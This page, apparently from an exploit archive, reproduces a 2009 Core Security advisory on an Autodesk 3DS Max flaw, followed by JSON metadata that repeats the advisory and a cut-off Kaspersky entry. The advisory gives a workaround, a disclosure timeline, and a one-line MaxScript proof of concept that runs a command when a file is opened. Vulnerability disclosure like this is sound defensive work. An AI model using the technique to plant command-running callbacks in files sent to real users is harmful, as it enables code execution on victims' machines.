Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
2009-11-23T00:00:00
ID 1337DAY-ID-8160 Type zdt Reporter Core Security Modified 2009-11-23T00:00:00
Description
Exploit for unknown platform in category local exploits
==================================================================
Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
==================================================================
# Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Core Security
# Published: 2009-11-23
# Verified: yes
view source
print?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
1. *Advisory Information*
Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
Advisory Id: CORE-2009-0909
Advisory URL:
http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution
Date published: 2009-11-23
Date of last update: 2009-11-20
Vendors contacted: Autodesk
Release mode: User release
2. *Vulnerability Information*
Class: Failure to Sanitize Data into a Different Plane [CWE-74]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36634
CVE Name: CVE-2009-3577
3. *Vulnerability Description*
Autodesk 3D Studio Max [2] is a modeling, animation and redering
package widely used for video game , film , multimedia and web content
developement. The software provides a built-in scripting language,
allowing users to bind custome code to actions performed in the
applciation. Execution of scripting code does not require explicit
permission from the user. This mechanim can be exploited by an
attacker to execute arbitrary code by enticing a victim to open .max
file with MaxScript application callbacks embedded.
4. *Vulnerable packages*
. Autodesk 3DSMax 2010
. Autodesk 3DSMax 2009
. Autodesk 3DSMax 2008
. Autodesk 3DSMax 9
. Autodesk 3DSMax 8
. Autodesk 3DSMax 7
. Autodesk 3DSMax 6
5. *Vendor Information, Solutions and Workarounds*
The vendor did not provide fixes or workaround information.
You can disable the automatic loading of embedded MaxScript by
following these steps:
. Go to Customize menu > Preferences > Preference Settings dialog >
MAXScript.
. Uncheck "Load/Save Scene Scripts".
. Uncheck "Load/Save Persistent Globals".
6. *Credits*
This vulnerability was discovered and researched by Sebastian Tello
from Core Security Technologies during Bugweek 2009 [1].
The publication of this advisory was coordinated by Fernando Russ from
Core Security Advisories Team.
7. *Technical Description / Proof of Concept Code*
Autodesk 3D Studio Max provides built-in scripting language called
MaxScript, which can be used to automate repetitive tasks, combine
existing functionality in new ways, develop new tools and user
interfaces and much more. Max allows users to bind MaxScript to
application callbacks in a way that could be exploited by an attacker
to execute arbitrary code by enticing a victim to open .max file with
MaxScript application callbacks embedded.
A Proof of Concept file can be obtained by following these simple
steps. Open Max, press F11 (MaxScript Listener), and paste this code:
/-----
callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")")
id:#mbLoadCallback persistent:true
- -----/
8. *Report Timeline*
. 2009-08-25:
Core Security Technologies ask the Autodesk Assistance Team for a
security contact to report the vulnerability.
. 2009-09-22:
Core asks the Autodesk Assistance Team for a security contact to
report the vulnerability.
. 2009-10-09:
Core contacts CERT to obtain security contact information for Autodesk.
. 2009-10-16:
CERT acknowledges the communication.
. 2009-10-19:
CERT sends their available contact information for Autodesk.
. 2009-10-19:
Core notifies Autodesk of the vulnerabilty report and announces its
initial plan to publish the content on November 2nd, 2009. Core
requests an acknoledgement within two working days and asks whehter
the details should be sent encrypted or in plaintext.
. 2009-10-19:
Autodesk acknowledges the report and requests the information to be
provided in encrypted form.
. 2009-10-20:
Core sends draft advisory and steps to reproduce the issue.
. 2009-10-27:
Core asks Autodesk about the status of the vulnerability report sent
on October 20th, 2009.
. 2009-10-27:
Autodesk acknowledges the communication indicating that the pertinent
Product Managers have been informed and are formulating a response.
. 2009-11-06:
Core notifies Autodesk about the missed deadline of November 2nd, 2009
and reuqests an status update. Publication of CORE-2009-0909 is
re-scheduled to November 16th, 2009 and is subject to change based on
concrete feedback from Autodesk.
. 2009-11-23:
Given the lack of response from Autodesk, Core decides to publish the
advisory CORE-2009-0909 as "user release".
9. *References*
[1] The author participated in Core Bugweek 2009 as member of the team
"Gimbal Lock N Load".
[2]
http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.
11. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN
TPwAn1AMCamFLaX3gHyUys//tHcyhlvn
=fPrL
-----END PGP SIGNATURE-----
# 0day.today [2018-01-04] #
{"hash": "aa94db4fddd55e04d9e7b10f85b551ae6920a0f2c51b6df5b56de6c59da56701", "id": "1337DAY-ID-8160", "lastseen": "2018-01-04T17:08:55", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "ae3b2b4186bdee4d3b6be3597325c52b", "key": "href"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "modified"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e83e081743bdf2aa0b1e0232426d32e6", "key": "reporter"}, {"hash": "85df63db799910c9501679a8173df048", "key": "sourceData"}, {"hash": "662a6d499f227491d24b6014816014a1", "key": "sourceHref"}, {"hash": "afb46b3bff54195f3cf66351ee9f89b6", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA11316"]}, {"type": "cve", "idList": ["CVE-2018-3639", "CVE-2017-5753"]}, {"type": "zdt", "idList": ["1337DAY-ID-28160", "1337DAY-ID-17648", "1337DAY-ID-11353", "1337DAY-ID-3577", "1337DAY-ID-8774"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107160", "OPENVAS:1361412562310808586", "OPENVAS:1361412562310805454", "OPENVAS:1361412562310804322"]}, {"type": "nessus", "idList": ["FREESWITCH_FS8160.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:110665"]}, {"type": "coresecurity", "idList": ["CORE-2009-0909"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8160", "SECURITYVULNS:DOC:11521", "SECURITYVULNS:VULN:4612", "SECURITYVULNS:DOC:8160"]}], "modified": "2018-01-04T17:08:55"}, "vulnersScore": 7.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8160", "description": "Exploit for unknown platform in category local exploits", "title": "Autodesk 3DS Max Application Callbacks Arbitrary Command Execution", "history": [{"bulletin": {"hash": "016f951a9d10632c951438ba1c37bd774d6b1a758a477e3d142ad594c002bf5b", "id": "1337DAY-ID-8160", "lastseen": "2016-04-19T02:52:47", "enchantments": {"score": {"value": 8.3, "modified": "2016-04-19T02:52:47"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "510e6dd8f6275e8c47bd0bf88bd46103", "key": "href"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "published"}, {"hash": "eb0ef883c0c06ac8ef5e8a92acb8913e", "key": "sourceData"}, {"hash": "e83e081743bdf2aa0b1e0232426d32e6", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "afb46b3bff54195f3cf66351ee9f89b6", "key": "title"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d06ad7ff143665c64a72820273ef119b", "key": "sourceHref"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8160", "description": "Exploit for unknown platform in category local exploits", "viewCount": 0, "title": "Autodesk 3DS Max Application Callbacks Arbitrary Command Execution", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================================\r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n==================================================================\r\n\r\n\r\n# Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Core Security\r\n# Published: 2009-11-23\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n \r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n \r\n \r\n \r\n1. *Advisory Information*\r\n \r\nTitle: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\nAdvisory Id: CORE-2009-0909\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/3dsmax-arbitrary-command-execution\r\nDate published: 2009-11-23\r\nDate of last update: 2009-11-20\r\nVendors contacted: Autodesk\r\nRelease mode: User release\r\n \r\n \r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Failure to Sanitize Data into a Different Plane [CWE-74]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 36634\r\nCVE Name: CVE-2009-3577\r\n \r\n \r\n \r\n3. *Vulnerability Description*\r\n \r\nAutodesk 3D Studio Max [2] is a modeling, animation and redering\r\npackage widely used for video game , film , multimedia and web content\r\ndevelopement. The software provides a built-in scripting language,\r\nallowing users to bind custome code to actions performed in the\r\napplciation. Execution of scripting code does not require explicit\r\npermission from the user. This mechanim can be exploited by an\r\nattacker to execute arbitrary code by enticing a victim to open .max\r\nfile with MaxScript application callbacks embedded.\r\n \r\n \r\n4. *Vulnerable packages*\r\n \r\n . Autodesk 3DSMax 2010\r\n . Autodesk 3DSMax 2009\r\n . Autodesk 3DSMax 2008\r\n . Autodesk 3DSMax 9\r\n . Autodesk 3DSMax 8\r\n . Autodesk 3DSMax 7\r\n . Autodesk 3DSMax 6\r\n \r\n \r\n5. *Vendor Information, Solutions and Workarounds*\r\n \r\nThe vendor did not provide fixes or workaround information.\r\n \r\nYou can disable the automatic loading of embedded MaxScript by\r\nfollowing these steps:\r\n \r\n . Go to Customize menu > Preferences > Preference Settings dialog >\r\nMAXScript.\r\n . Uncheck \"Load/Save Scene Scripts\".\r\n . Uncheck \"Load/Save Persistent Globals\".\r\n \r\n \r\n6. *Credits*\r\n \r\nThis vulnerability was discovered and researched by Sebastian Tello\r\nfrom Core Security Technologies during Bugweek 2009 [1].\r\n \r\nThe publication of this advisory was coordinated by Fernando Russ from\r\nCore Security Advisories Team.\r\n \r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\nAutodesk 3D Studio Max provides built-in scripting language called\r\nMaxScript, which can be used to automate repetitive tasks, combine\r\nexisting functionality in new ways, develop new tools and user\r\ninterfaces and much more. Max allows users to bind MaxScript to\r\napplication callbacks in a way that could be exploited by an attacker\r\nto execute arbitrary code by enticing a victim to open .max file with\r\nMaxScript application callbacks embedded.\r\n \r\nA Proof of Concept file can be obtained by following these simple\r\nsteps. Open Max, press F11 (MaxScript Listener), and paste this code:\r\n \r\n/-----\r\n callbacks.addScript #filePostOpen (\"DOSCommand(\\\"calc.exe\\\")\")\r\nid:#mbLoadCallback persistent:true \r\n \r\n- -----/\r\n \r\n \r\n \r\n8. *Report Timeline*\r\n \r\n. 2009-08-25:\r\nCore Security Technologies ask the Autodesk Assistance Team for a\r\nsecurity contact to report the vulnerability.\r\n \r\n. 2009-09-22:\r\nCore asks the Autodesk Assistance Team for a security contact to\r\nreport the vulnerability.\r\n \r\n. 2009-10-09:\r\nCore contacts CERT to obtain security contact information for Autodesk.\r\n \r\n. 2009-10-16:\r\nCERT acknowledges the communication.\r\n \r\n. 2009-10-19:\r\nCERT sends their available contact information for Autodesk.\r\n \r\n. 2009-10-19:\r\nCore notifies Autodesk of the vulnerabilty report and announces its\r\ninitial plan to publish the content on November 2nd, 2009. Core\r\nrequests an acknoledgement within two working days and asks whehter\r\nthe details should be sent encrypted or in plaintext.\r\n \r\n. 2009-10-19:\r\nAutodesk acknowledges the report and requests the information to be\r\nprovided in encrypted form.\r\n \r\n. 2009-10-20:\r\nCore sends draft advisory and steps to reproduce the issue.\r\n \r\n. 2009-10-27:\r\nCore asks Autodesk about the status of the vulnerability report sent\r\non October 20th, 2009.\r\n \r\n. 2009-10-27:\r\nAutodesk acknowledges the communication indicating that the pertinent\r\nProduct Managers have been informed and are formulating a response.\r\n \r\n. 2009-11-06:\r\nCore notifies Autodesk about the missed deadline of November 2nd, 2009\r\nand reuqests an status update. Publication of CORE-2009-0909 is\r\nre-scheduled to November 16th, 2009 and is subject to change based on\r\nconcrete feedback from Autodesk.\r\n \r\n. 2009-11-23:\r\nGiven the lack of response from Autodesk, Core decides to publish the\r\nadvisory CORE-2009-0909 as \"user release\".\r\n \r\n \r\n \r\n9. *References*\r\n \r\n[1] The author participated in Core Bugweek 2009 as member of the team\r\n\"Gimbal Lock N Load\".\r\n[2]\r\nhttp://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112\r\n \r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is\r\ncharged with anticipating the future needs and requirements for\r\ninformation security technologies. We conduct our research in several\r\nimportant areas of computer security including system vulnerabilities,\r\ncyber attack planning and simulation, source code auditing, and\r\ncryptography. Our results include problem formalization,\r\nidentification of vulnerabilities, novel solutions and prototypes for\r\nnew technologies. CoreLabs regularly publishes security advisories,\r\ntechnical papers, project information and shared software tools for\r\npublic use at: http://www.coresecurity.com/corelabs.\r\n \r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources\r\nare exposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and\r\nsoftware security auditing. Based in Boston, MA and Buenos Aires,\r\nArgentina, Core Security Technologies can be reached at 617-399-6980\r\nor on the Web at http://www.coresecurity.com.\r\n \r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper\r\ncredit is given.\r\n \r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.12 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n \r\niEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN\r\nTPwAn1AMCamFLaX3gHyUys//tHcyhlvn\r\n=fPrL\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2009-11-23T00:00:00", "references": [], "reporter": "Core Security", "modified": "2009-11-23T00:00:00", "href": "http://0day.today/exploit/description/8160"}, "lastseen": "2016-04-19T02:52:47", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================================\r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n==================================================================\r\n\r\n\r\n# Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Core Security\r\n# Published: 2009-11-23\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n \r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n \r\n \r\n \r\n1. *Advisory Information*\r\n \r\nTitle: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\nAdvisory Id: CORE-2009-0909\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/3dsmax-arbitrary-command-execution\r\nDate published: 2009-11-23\r\nDate of last update: 2009-11-20\r\nVendors contacted: Autodesk\r\nRelease mode: User release\r\n \r\n \r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Failure to Sanitize Data into a Different Plane [CWE-74]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 36634\r\nCVE Name: CVE-2009-3577\r\n \r\n \r\n \r\n3. *Vulnerability Description*\r\n \r\nAutodesk 3D Studio Max [2] is a modeling, animation and redering\r\npackage widely used for video game , film , multimedia and web content\r\ndevelopement. The software provides a built-in scripting language,\r\nallowing users to bind custome code to actions performed in the\r\napplciation. Execution of scripting code does not require explicit\r\npermission from the user. This mechanim can be exploited by an\r\nattacker to execute arbitrary code by enticing a victim to open .max\r\nfile with MaxScript application callbacks embedded.\r\n \r\n \r\n4. *Vulnerable packages*\r\n \r\n . Autodesk 3DSMax 2010\r\n . Autodesk 3DSMax 2009\r\n . Autodesk 3DSMax 2008\r\n . Autodesk 3DSMax 9\r\n . Autodesk 3DSMax 8\r\n . Autodesk 3DSMax 7\r\n . Autodesk 3DSMax 6\r\n \r\n \r\n5. *Vendor Information, Solutions and Workarounds*\r\n \r\nThe vendor did not provide fixes or workaround information.\r\n \r\nYou can disable the automatic loading of embedded MaxScript by\r\nfollowing these steps:\r\n \r\n . Go to Customize menu > Preferences > Preference Settings dialog >\r\nMAXScript.\r\n . Uncheck \"Load/Save Scene Scripts\".\r\n . Uncheck \"Load/Save Persistent Globals\".\r\n \r\n \r\n6. *Credits*\r\n \r\nThis vulnerability was discovered and researched by Sebastian Tello\r\nfrom Core Security Technologies during Bugweek 2009 [1].\r\n \r\nThe publication of this advisory was coordinated by Fernando Russ from\r\nCore Security Advisories Team.\r\n \r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\nAutodesk 3D Studio Max provides built-in scripting language called\r\nMaxScript, which can be used to automate repetitive tasks, combine\r\nexisting functionality in new ways, develop new tools and user\r\ninterfaces and much more. Max allows users to bind MaxScript to\r\napplication callbacks in a way that could be exploited by an attacker\r\nto execute arbitrary code by enticing a victim to open .max file with\r\nMaxScript application callbacks embedded.\r\n \r\nA Proof of Concept file can be obtained by following these simple\r\nsteps. Open Max, press F11 (MaxScript Listener), and paste this code:\r\n \r\n/-----\r\n callbacks.addScript #filePostOpen (\"DOSCommand(\\\"calc.exe\\\")\")\r\nid:#mbLoadCallback persistent:true \r\n \r\n- -----/\r\n \r\n \r\n \r\n8. *Report Timeline*\r\n \r\n. 2009-08-25:\r\nCore Security Technologies ask the Autodesk Assistance Team for a\r\nsecurity contact to report the vulnerability.\r\n \r\n. 2009-09-22:\r\nCore asks the Autodesk Assistance Team for a security contact to\r\nreport the vulnerability.\r\n \r\n. 2009-10-09:\r\nCore contacts CERT to obtain security contact information for Autodesk.\r\n \r\n. 2009-10-16:\r\nCERT acknowledges the communication.\r\n \r\n. 2009-10-19:\r\nCERT sends their available contact information for Autodesk.\r\n \r\n. 2009-10-19:\r\nCore notifies Autodesk of the vulnerabilty report and announces its\r\ninitial plan to publish the content on November 2nd, 2009. Core\r\nrequests an acknoledgement within two working days and asks whehter\r\nthe details should be sent encrypted or in plaintext.\r\n \r\n. 2009-10-19:\r\nAutodesk acknowledges the report and requests the information to be\r\nprovided in encrypted form.\r\n \r\n. 2009-10-20:\r\nCore sends draft advisory and steps to reproduce the issue.\r\n \r\n. 2009-10-27:\r\nCore asks Autodesk about the status of the vulnerability report sent\r\non October 20th, 2009.\r\n \r\n. 2009-10-27:\r\nAutodesk acknowledges the communication indicating that the pertinent\r\nProduct Managers have been informed and are formulating a response.\r\n \r\n. 2009-11-06:\r\nCore notifies Autodesk about the missed deadline of November 2nd, 2009\r\nand reuqests an status update. Publication of CORE-2009-0909 is\r\nre-scheduled to November 16th, 2009 and is subject to change based on\r\nconcrete feedback from Autodesk.\r\n \r\n. 2009-11-23:\r\nGiven the lack of response from Autodesk, Core decides to publish the\r\nadvisory CORE-2009-0909 as \"user release\".\r\n \r\n \r\n \r\n9. *References*\r\n \r\n[1] The author participated in Core Bugweek 2009 as member of the team\r\n\"Gimbal Lock N Load\".\r\n[2]\r\nhttp://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112\r\n \r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is\r\ncharged with anticipating the future needs and requirements for\r\ninformation security technologies. We conduct our research in several\r\nimportant areas of computer security including system vulnerabilities,\r\ncyber attack planning and simulation, source code auditing, and\r\ncryptography. Our results include problem formalization,\r\nidentification of vulnerabilities, novel solutions and prototypes for\r\nnew technologies. CoreLabs regularly publishes security advisories,\r\ntechnical papers, project information and shared software tools for\r\npublic use at: http://www.coresecurity.com/corelabs.\r\n \r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources\r\nare exposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and\r\nsoftware security auditing. Based in Boston, MA and Buenos Aires,\r\nArgentina, Core Security Technologies can be reached at 617-399-6980\r\nor on the Web at http://www.coresecurity.com.\r\n \r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper\r\ncredit is given.\r\n \r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.12 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n \r\niEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN\r\nTPwAn1AMCamFLaX3gHyUys//tHcyhlvn\r\n=fPrL\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "published": "2009-11-23T00:00:00", "references": [], "reporter": "Core Security", "modified": "2009-11-23T00:00:00", "href": "https://0day.today/exploit/description/8160"}
{"kaspersky": [{"lastseen": "2019-03-21T00:14:08", "bulletinFamily": "info", "description": "### *Detect date*:\n09/11/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities were found in PRODUCT. Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges, cause denial of service, execute arbitrary code, bypass security restrictions.\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1709 for 64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nWindows Server, version 1803 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8336](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8336>) \n[CVE-2018-8433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8433>) \n[CVE-2018-8462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8462>) \n[CVE-2018-8442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8442>) \n[CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>) \n[CVE-2018-8438](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8438>) \n[CVE-2018-8455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8455>) \n[CVE-2018-8392](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8392>) \n[CVE-2018-8410](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8410>) \n[CVE-2018-8335](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8335>) \n[CVE-2018-8444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8444>) \n[CVE-2018-8441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8441>) \n[CVE-2018-8332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8332>) \n[CVE-2018-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0965>) \n[CVE-2018-8422](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8422>) \n[CVE-2018-8271](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8271>) \n[CVE-2018-8437](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8437>) \n[CVE-2018-8443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8443>) \n[CVE-2018-8475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8475>) \n[CVE-2018-8419](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8419>) \n[CVE-2018-8434](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8434>) \n[CVE-2018-8420](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8420>) \n[CVE-2018-8436](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8436>) \n[CVE-2018-8439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8439>) \n[CVE-2018-8449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8449>) \n[CVE-2018-8435](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8435>) \n[CVE-2018-8424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8424>) 